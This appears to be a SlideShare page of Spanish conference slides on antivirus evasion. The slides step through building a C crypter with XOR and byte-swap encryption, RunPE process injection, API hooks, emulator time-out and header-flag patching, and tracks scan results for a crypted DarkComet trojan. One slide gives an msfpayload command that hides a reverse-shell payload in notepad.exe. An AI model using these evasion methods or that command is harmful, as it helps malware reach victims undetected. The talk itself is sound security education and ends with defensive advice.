SlideShare una empresa de Scribd logo
Desmitificando el AntiVirus 
Desmitificando el 
AntiVirus 
#NcN2k14 Abraham Pasamar (@apasamar)
Whoami 
Sobre mi: 
Abraham Pasamar @apasamar 
CEO Inci e apasamar@incide.es 
www.incide.es PGP key ID: 
0x3ee5fcf7693108b4 
d 
+10 años seguridad 
Computer Forensics 
Incident Response 
Expert Witness 
Pentesting 
PASSWORD: 
1234567 
#NcN2k14 Abraham Pasamar (@apasamar)
Efectividad de los Antivirus 
Evasión de Antivirus 
Crypters C Crypter 
DEMO 
#NcN2k14 Abraham Pasamar (@apasamar)
Agradecimientos 
#NcN2k14 Abraham Pasamar (@apasamar) 
Jose Selvi 
Abel Gómez 
camisetasfrikis.es 
Vrillon/Venon 
Creative Commons
Antivirus 
#NcN2k14 Abraham Pasamar (@apasamar)
Antivirus 
#NcN2k14 Abraham Pasamar (@apasamar) 
¿Nos protegen? 
Sí 
¿Hasta qué punto? 
Todo lo que pueden 
respecto de las ‘infecciones’ comunes 
y lo que pueden ‘prever’
Ataque dirigido (APT) 
Cybercriminales 
¿Nos protegen? 
No mucho 
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes 
Las defensas convencionales son insuficientes 
#NcN2k14 Abraham Pasamar (@apasamar)
Ataque dirigido (APT) 
Cybercriminales 
¿Nos protegen? 
No mucho 
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes 
Las defensas convencionales son insuficientes 
#NcN2k14 Abraham Pasamar (@apasamar)
Press 
#NcN2k14 Abraham Pasamar (@apasamar) 
Brian Dye, CEO de Symantec 
mayo 2014 
Paradigma ha cambiado —> protección AV host/perimetro es insuficiente
AV: ¿Cómo funcionan? 
Escanean binarios en el DISCO 
¿Escanean en MEMORIA? algunos y poco :( 
Buscan FIRMAS @ AV BBDD 
Buscan TÉCNICAS MALICIOSAS (heurística) 
EMULADOR (ejecución parcial) Tiempo Real 
#NcN2k14 Abraham Pasamar (@apasamar)
¿Por qué evadir AV’s? 
BAD GUYS: 
MALWARE = $$$$$$$ 
Botnets, Ransomware, … 
GOOD GUYS: 
#NcN2k14 Abraham Pasamar (@apasamar) 
APT 
Auditoría, Pentesting
¿Cómo evadir AV’s? 
Encoders 
Packers 
Crypters 
msfpayload windows/shell/ 
reverse_tcp LHOST=192.168.1.75 
LPORT=4444 R | msfencode -c 5 
-e x86/shikata_ga_nai -x 
notepad.exe > notepad2.exe 
#NcN2k14 Abraham Pasamar (@apasamar)
¿Cómo evadir AV’s? 
Encoders 
MALWARE suele ser una pieza compleja. 
Packers 
Crypter es mucho más simple. 
Permite proteger malware detectado. 
Crypters 
msfpayload windows/shell/ 
reverse_tcp LHOST=192.168.1.75 
LPORT=4444 R | msfencode -c 5 
-e x86/shikata_ga_nai -x 
notepad.exe > notepad2.exe 
REUTILIZACIÓN 
TIP: 
Método Público = MAL 
Método Privado = BIEN 
#NcN2k14 Abraham Pasamar (@apasamar)
¿Información sobre Crypters? 
Papers 
“Abusing File Processing in Malware Detectors for Fun and 
Profit” (2012) 
Suman Jana and Vitaly Shmatikov 
The University of Texas at Austin 
“Bypassing Anti-Virus Scanners” (2012) 
InterNOT Security Team 
#NcN2k14 Abraham Pasamar (@apasamar) 
“Hyperion: 
Implementation of a PE-Crypter”(2012) 
Christian Ammann 
http://www.nullsecurity.net/ 
“One packer to rule them all: Empirical identification, 
comparison and circumvention of current Antivirus detection 
techniques”(BruCON 2014) 
Arne Swinnen,Alaeddine Mesbahi
Foros Underground 
#NcN2k14 Abraham Pasamar (@apasamar) 
Manuales 
Video-Tutoriales 
Binarios 
Código 
Herramientas 
Multi AV-Scanners 
Enlaces: 
http://www.indetectables.net 
http://www.udtools.net 
http://www.masters-hackers.info 
http://www.level-23.biz 
http://www.corp-51.net 
http://www.underc0de.org
¿Qué es un Crypter? 
Software creado para ocultar código malicioso y hacerlo 
indetectable a los antivirus (FUD) 
STUB 
MALWARE DETECTADO 
XOR, RC4, ... 
MALWARE CIFRADO 
#NcN2k14 Abraham Pasamar (@apasamar) 
CRYPTER 
(Builder) 
STUB 
CRYPTER + STUB 
exe 
dll 
recurso
Builder / Stub 
B u i l de r: 
S e e n c a rg a de c om p o n e r e l 
n ue v o e je c u t a b l e . 
B u i l de r (M a l wa re De te c t a d o) = 
St u b + M a l wa re C i f r a d o 
St u b: 
S e e n c a r g a de : 
* De s c i f r a r e l M a l wa re C i f r a d o 
* Ej e c u t a r l o d i re c t ame n t e e n 
me m o r i a s i n q ue e l M a l wa re 
t o q u e e l d i s c o 
P i e z a más i m p o r t a n t e 
S e e n f re n t a a l o s AV’s 
#NcN2k14 Abraham Pasamar (@apasamar)
RunPE o Dynamic Forking 
CreateProcess 
EP 2 ReadFile WriteProcessMemory 
#NcN2k14 Abraham Pasamar (@apasamar) 
PROCESO 
1 
(CREATE_SUSPENDED) 
GetThreadContext 
EP I 
PEB EBX 
EAX 
1 
+8 PROCESO 
2 
BaseAddress 2 
ResumeThread SetThreadContext
Let’s code a C Crypter 
#NcN2k14 Abraham Pasamar (@apasamar) 
Builder 
MALWARE 
STUB MALWARE CIFRADO 
C O N T E N E D O R
Let’s code a C Crypter 
RUTINA DE CIFRADO 
#NcN2k14 Abraham Pasamar (@apasamar) 
Builder
Let’s code a C Crypter 
STUB+FIRMA+MALWARE CIFRADO 
#NcN2k14 Abraham Pasamar (@apasamar) 
Builder
Let’s code a C Crypter 
Descifrado (decryptbuffer=XOR[buffer]) 
#NcN2k14 Abraham Pasamar (@apasamar) 
Stub 
Localizar la FIRMA SEPARADORA
Let’s code a C Crypter 
Arrancar el proceso en memoria 
(Dynamic Forking) 
CreateProcess (CREATE_SUSPEND) 
#NcN2k14 Abraham Pasamar (@apasamar) 
Stub 
Estructuras cabecera ejecutable 
WriteProcessMemory 
ResumeThread
Let’s SCAN the Crypter 
Multi AV SCAN 
#NcN2k14 Abraham Pasamar (@apasamar) 
TROJAN SERVER 
(Darkcomet). SIN CRYPTER 
TROJAN SERVER CRYPTED 
(stub+[crypted Darkcomet])
Improving the Crypter 
:( 13 Signatures … ¿ Qué podemos hacer ? 
API HOOKS :) 
GetProcAddress 
#NcN2k14 Abraham Pasamar (@apasamar)
Let’s SCAN the Crypter 
Multi AV SCAN 
V1 - Original Crypter V2 - API Hooks 
#NcN2k14 Abraham Pasamar (@apasamar)
Improving the Crypter 
Añadiendo soporte para parámetros 
main —> WinMain (nCmdLine) 
#NcN2k14 Abraham Pasamar (@apasamar)
Improving the Crypter 
Cambiando la rutina de cifrado 
XOR —> byte SWAP 
#NcN2k14 Abraham Pasamar (@apasamar)
Let’s SCAN the Crypter 
Multi AV SCAN 
V2 - API Hooks V3 - Parameters & byte Swap 
Ooohhh!!! 
#NcN2k14 Abraham Pasamar (@apasamar)
Improving the Crypter 
FIRMAS indican HEURISTICA 
¡¡¡ Matemos las firmas heurísticas !!! 
Exhausting routine 
Emulador —> Time Out 
ANTIVIRUS SANDBOX 
REAL TIME DETECTION 
No es posible procesarlo en tiempo real 
#NcN2k14 Abraham Pasamar (@apasamar)
Let’s SCAN the Crypter 
Multi AV SCAN 
V4 - Exhausting Routine 
V3 - Parameters & byte Swap 
OH YEAH !!! 
#NcN2k14 Abraham Pasamar (@apasamar)
Improving the Crypter 
FIRMAS Estáticas 
AVAST 
Método de cifrado 
Variante: SWAP +/- 1 
#NcN2k14 Abraham Pasamar (@apasamar)
Improving the Crypter 
FIRMAS Estáticas 
AVIRA 
Firmas Cabecera (CRC/clusterización) - FLAGS Sección 
CAMBIAMOS FLAGs 
VALOR NO ESPERADO 
#NcN2k14 Abraham Pasamar (@apasamar)
Let’s SCAN the Crypter 
Multi AV SCAN 
V4 - Exhausting Routine V6 - Cifrado+ & patch Flags 
Awesome!!! 
#NcN2k14 Abraham Pasamar (@apasamar)
DEMO 
Crypter en C (FUD) 
Probarlo en un ataque 
Ingeniería social (1 click) 
Word + Macro (downloader) 
Sandworm (0 clicks) 
Ejecución FUD-Trojan en TR 
#NcN2k14 Abraham Pasamar (@apasamar)
Conclusiones 
Bypass AVs es POSIBLE 
—-> Compromiso INFORMACIÓN 
Necesario prestar atención al COMPORTAMIENTO 
Algunos elementos a considerar: 
Perímetro (callbacks C&C) 
SANDBOX 
Contexto 
#NcN2k14 Abraham Pasamar (@apasamar)
Imágenes 
Banco Imáges Propio 
http://www.gratisography.com/ 
http://broadbandandsocialjustice.org/ 
Flickr, user: eviltomthai 
Chiswick Chap - Own work 
#NcN2k14 Abraham Pasamar (@apasamar)
Gracias 
apasamar 
INCIDE 
Avda. Diagonal, 640 6ª Planta 
08017 Barcelona 
info@incide.es 
http://www.incide.es 
1NC1D3 
http://www.incide.es/blog-incide/ 
http://www.youtube.com/incidetube 
Companies > INCIDE - Investigación Digital 
Tel./Fax. +34 932 546 277 / +34 932 546 314 
#NcN2k14 Abraham Pasamar (@apasamar)

Más contenido relacionado

La actualidad más candente

Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
RootedCON
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
RootedCON
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertos
Francisco Vergara
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
RootedCON
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
RootedCON
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
Websec México, S.C.
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerraFutura Networks
 
Seguridad & Python: El desarrollo seguro no sólo es cosa de Java
Seguridad & Python: El desarrollo seguro no sólo es cosa de JavaSeguridad & Python: El desarrollo seguro no sólo es cosa de Java
Seguridad & Python: El desarrollo seguro no sólo es cosa de Java
OwaspMadrid Chapter
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
RootedCON
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Websec México, S.C.
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
RootedCON
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Websec México, S.C.
 
Seguridad so pii_2011
Seguridad so pii_2011Seguridad so pii_2011
Seguridad so pii_2011
Jacobo Avariento
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
Websec México, S.C.
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
PaloSanto Solutions
 
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Software Guru
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]RootedCON
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free security
Antonio Toriz
 
Taller SITEC 2010
Taller SITEC 2010Taller SITEC 2010
Taller SITEC 2010
Jorge Hernandez
 

La actualidad más candente (20)

Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
 
Tecnicas de escaneo de puertos
Tecnicas de escaneo de puertosTecnicas de escaneo de puertos
Tecnicas de escaneo de puertos
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerra
 
Seguridad & Python: El desarrollo seguro no sólo es cosa de Java
Seguridad & Python: El desarrollo seguro no sólo es cosa de JavaSeguridad & Python: El desarrollo seguro no sólo es cosa de Java
Seguridad & Python: El desarrollo seguro no sólo es cosa de Java
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
 
Seguridad so pii_2011
Seguridad so pii_2011Seguridad so pii_2011
Seguridad so pii_2011
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
 
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free security
 
Taller SITEC 2010
Taller SITEC 2010Taller SITEC 2010
Taller SITEC 2010
 

Similar a NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
INCIDE
 
Un caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAMUn caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAM
Eventos Creativos
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
Mauricio Velazco
 
WordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las BackdoorsWordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las Backdoors
Nestor Angulo de Ugarte
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0
Alejandro Ramos
 
Hacking WordPress. El Arte de La Guerra.
Hacking WordPress. El Arte de La Guerra.Hacking WordPress. El Arte de La Guerra.
Hacking WordPress. El Arte de La Guerra.
Nestor Angulo de Ugarte
 
Técnicas de seguridad (María)
Técnicas de seguridad (María)Técnicas de seguridad (María)
Técnicas de seguridad (María)monicanaranjo
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
navajanegra
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
z0mbiehunt3r
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticos
Jaime Restrepo
 
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetTecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Javier Junquera
 
Introduccion al Ethical Hacking
Introduccion al Ethical HackingIntroduccion al Ethical Hacking
Introduccion al Ethical Hacking
Jose Manuel Acosta
 
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Websec México, S.C.
 
Backtrack claves wep pirate night
Backtrack claves wep pirate nightBacktrack claves wep pirate night
Backtrack claves wep pirate night
Miguel Alexander Segovia Lovera
 
Hackon URJC
Hackon URJCHackon URJC
Me han Hackeado... ¿Y ahora qué?
Me han Hackeado... ¿Y ahora qué?Me han Hackeado... ¿Y ahora qué?
Me han Hackeado... ¿Y ahora qué?
Nestor Angulo de Ugarte
 
BernhardPOS Malware
BernhardPOS MalwareBernhardPOS Malware
BernhardPOS Malware
David Thomas
 

Similar a NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus (20)

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
 
Un caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAMUn caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAM
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
WordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las BackdoorsWordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las Backdoors
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0
 
Hacking WordPress. El Arte de La Guerra.
Hacking WordPress. El Arte de La Guerra.Hacking WordPress. El Arte de La Guerra.
Hacking WordPress. El Arte de La Guerra.
 
Técnicas de seguridad (María)
Técnicas de seguridad (María)Técnicas de seguridad (María)
Técnicas de seguridad (María)
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticos
 
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetTecnologías avanzadas de descubrimiento y análisis de la Dark Net
Tecnologías avanzadas de descubrimiento y análisis de la Dark Net
 
Introduccion al Ethical Hacking
Introduccion al Ethical HackingIntroduccion al Ethical Hacking
Introduccion al Ethical Hacking
 
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
 
Backtrack claves wep pirate night
Backtrack claves wep pirate nightBacktrack claves wep pirate night
Backtrack claves wep pirate night
 
Hackon URJC
Hackon URJCHackon URJC
Hackon URJC
 
Me han Hackeado... ¿Y ahora qué?
Me han Hackeado... ¿Y ahora qué?Me han Hackeado... ¿Y ahora qué?
Me han Hackeado... ¿Y ahora qué?
 
BernhardPOS Malware
BernhardPOS MalwareBernhardPOS Malware
BernhardPOS Malware
 

Más de INCIDE

Es Whatsapp un testigo fiable en un juicio?
Es Whatsapp un testigo fiable en un juicio?Es Whatsapp un testigo fiable en un juicio?
Es Whatsapp un testigo fiable en un juicio?
INCIDE
 
Evading anti virus detection in downloader scripts - zusy
Evading anti virus detection in downloader scripts - zusyEvading anti virus detection in downloader scripts - zusy
Evading anti virus detection in downloader scripts - zusy
INCIDE
 
MODIFYING WHATSAPP MESSAGES FOR DUMMIES
MODIFYING WHATSAPP MESSAGES FOR DUMMIESMODIFYING WHATSAPP MESSAGES FOR DUMMIES
MODIFYING WHATSAPP MESSAGES FOR DUMMIES
INCIDE
 
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayAntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
INCIDE
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de crypters
INCIDE
 
Seminario análisis forense - quién se ha llevado mi archivo
Seminario análisis forense  - quién se ha llevado mi archivoSeminario análisis forense  - quién se ha llevado mi archivo
Seminario análisis forense - quién se ha llevado mi archivo
INCIDE
 

Más de INCIDE (6)

Es Whatsapp un testigo fiable en un juicio?
Es Whatsapp un testigo fiable en un juicio?Es Whatsapp un testigo fiable en un juicio?
Es Whatsapp un testigo fiable en un juicio?
 
Evading anti virus detection in downloader scripts - zusy
Evading anti virus detection in downloader scripts - zusyEvading anti virus detection in downloader scripts - zusy
Evading anti virus detection in downloader scripts - zusy
 
MODIFYING WHATSAPP MESSAGES FOR DUMMIES
MODIFYING WHATSAPP MESSAGES FOR DUMMIESMODIFYING WHATSAPP MESSAGES FOR DUMMIES
MODIFYING WHATSAPP MESSAGES FOR DUMMIES
 
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayAntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de crypters
 
Seminario análisis forense - quién se ha llevado mi archivo
Seminario análisis forense  - quién se ha llevado mi archivoSeminario análisis forense  - quién se ha llevado mi archivo
Seminario análisis forense - quién se ha llevado mi archivo
 

Último

(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
vazquezgarciajesusma
 
Ventajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloroVentajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloro
durangense277
 
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
espinozaernesto427
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
AlejandraCasallas7
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
Emilio Casbas
 
Diagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdfDiagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdf
ManuelCampos464987
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
cdraco
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
JulyMuoz18
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
Leidyfuentes19
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
ItsSofi
 
MANUAL DEL DECODIFICADOR DVB S2. PARA VSAT
MANUAL DEL DECODIFICADOR DVB  S2. PARA VSATMANUAL DEL DECODIFICADOR DVB  S2. PARA VSAT
MANUAL DEL DECODIFICADOR DVB S2. PARA VSAT
Ing. Julio Iván Mera Casas
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
cristianrb0324
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
